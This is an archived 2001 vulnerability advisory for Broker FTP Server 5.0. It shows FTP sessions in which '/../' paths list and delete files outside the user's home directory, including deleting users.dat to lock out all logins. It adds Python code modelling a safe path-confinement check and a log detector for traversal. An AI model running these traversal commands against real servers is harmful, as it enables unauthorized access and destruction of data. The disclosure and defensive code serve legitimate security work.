Date: Sat, 3 Mar 2001 18:56:23 -0000
From: [email protected]
To: [email protected]
Subject: Broker Ftp Server 5.0 Vulnerability
Vulnerability:
Users can break out of their root directory and list directories outside of it.
Depending on the privileges you have, other commands such as delete may also be
executed outside of the home directory.
e:\crap\ was used as the home directory, with deleting files in e:\crap enabled.
Detail:
Problem: again, relative paths. A path argument containing ".." is not confined
to the user's home directory.
dir:
lists directories outside of the root directory.
Risk: medium-high
230 User test logged in.
ftp> dir
200 Port command successful.
150 Opening data connection for directory list.
drw-rw-rw- 1 ftp ftp 0 Mar 02 12:17 test
-rw-rw-rw- 1 ftp ftp 6 Mar 02 12:33 movedtohomedir.txt
-rw-rw-rw- 1 ftp ftp 11 Mar 02 00:29 bisontest.txt
drw-rw-rw- 1 ftp ftp 0 Mar 03 15:59 HTTP
drw-rw-rw- 1 ftp ftp 0 Mar 03 17:05 huhu
226 File sent ok
FTP: 323 Bytes empfangen in 0,00Sekunden 323000,00KB/s
ftp> cd ..
550 CWD failed. ..: No permission
ftp> dir /../experimental/broker/data/
200 Port command successful.
150 Opening data connection for directory list.
-rw-rw-rw- 1 ftp ftp 175 Nov 19 2000 UserGrps.dat
-rw-rw-rw- 1 ftp ftp 154 Mar 03 16:54 Users.dat
-rw-rw-rw- 1 ftp ftp 0 Mar 03 16:33 Users.4800.bak
-rw-rw-rw- 1 ftp ftp 0 Mar 03 16:34 Users.4800-Prof.bak
-rw-rw-rw- 1 ftp ftp 31 Mar 03 16:59 BannCtrl.ini
-rw-rw-rw- 1 ftp ftp 34 Mar 03 17:08 KickCtrl.ini
-rw-rw-rw- 1 ftp ftp 38 Mar 03 16:37 Events_1.dat
-rw-rw-rw- 1 ftp ftp 0 Mar 03 16:53 Events_lst_1.dat
-rw-rw-rw- 1 ftp ftp 154 Mar 03 16:54 Kopie von Users.dat
226 File sent ok
FTP: 629 Bytes empfangen in 0,00Sekunden 629000,00KB/s
delete:
deletes files outside of the root directory.
ftp> delete /../experimental/broker/data/users.dat
250 File '/../experimental/broker/data/users.dat' deleted.
ftp> quit
221-Thank you for your visit.
221-
221 Goodbye.
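The root cause shown in the two sessions above is that the path argument to DIR and DELETE is appended to the home directory without first being confined to it, so a leading "/.." walks out of e:\crap. The following Python is an added illustration written for this post, not code from Broker or from the advisory's author. It assumes (as the advisory's output suggests, but does not prove) that the server simply glues the request path onto the home directory; naive_join() models that behaviour, confine() is the per-segment resolver a server should use instead (it refuses, rather than silently clamps, any ".." that would climb above the home directory), and flags_traversal() is a small check for ".." segments in logged FTP command lines. The home directory and the file names are the ones from the advisory; the function names are my own.

```python
"""Path confinement for an FTP-style virtual filesystem (added example)."""
import posixpath
import re
from typing import List, Optional

# Home directory from the advisory (e:\crap), written with forward slashes.
HOME = "e:/crap"


def naive_join(home: str, cwd: str, requested: str) -> str:
    """Assumed failure mode: the request path is glued onto the home directory
    and handed to the OS, which then resolves '..' itself and climbs out."""
    req = requested.replace("\\", "/")
    if not req.startswith("/"):
        req = cwd.rstrip("/") + "/" + req
    return home + req  # e.g. 'e:/crap/../experimental/broker/data/users.dat'


def confine(home: str, cwd: str, requested: str) -> Optional[str]:
    """Resolve `requested` (absolute, or relative to the virtual `cwd`) inside
    `home`. Returns the real path, or None when any '..' would leave home."""
    req = requested.replace("\\", "/")  # treat both separators alike
    if not req.startswith("/"):
        req = posixpath.join(cwd, req)
    parts: List[str] = []
    for seg in req.split("/"):
        if seg in ("", "."):
            continue  # empty segment from '//' or trailing '/', or '.'
        if seg == "..":
            if not parts:
                return None  # would climb above the home directory: refuse
            parts.pop()
            continue
        parts.append(seg)
    return home + "/" + "/".join(parts) if parts else home


# A '..' path segment bounded by a separator or by the start/end of the argument.
_TRAVERSAL = re.compile(r"(^|[\\/])\.\.([\\/]|$)")


def flags_traversal(command_line: str) -> bool:
    """True when the argument of a logged FTP command (e.g. 'DELE /../x')
    contains a '..' segment; useful for reviewing transfer logs."""
    _verb, _, arg = command_line.strip().partition(" ")
    return bool(_TRAVERSAL.search(arg))


if __name__ == "__main__":
    # Constructed inputs mirroring the advisory's sessions.
    print(naive_join(HOME, "/", "/../experimental/broker/data/users.dat"))
    print(confine(HOME, "/", "test"))
    print(confine(HOME, "/test", "../bisontest.txt"))
    print(confine(HOME, "/", "/../experimental/broker/data/"))
    print(flags_traversal("DELE /../experimental/broker/data/users.dat"))
```

Note that confine() models the server's correct answer to "cd .." at the root (the 550 in the first session) and gives the same answer for "/../...": the request is rejected instead of being clamped to the root, which makes the attempt visible in the log rather than quietly succeeding or quietly doing something else.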
C:\>ftp 10.17.3.44
Verbindung mit 10.17.3.44 wurde hergestellt.
220 FTP Server ready [***]
Benutzer (10.17.3.44:(none)): test
331 Password required for test.
Kennwort:
530 Login incorrect.
Anmeldung fehlgeschlagen.
ftp> :(
By deleting users.dat, no one will be able to log on any more ...
put/get commands seem to be secure...
This was tested with Win2k and the trial version of Broker ver. 5.0
[email protected] or
[email protected]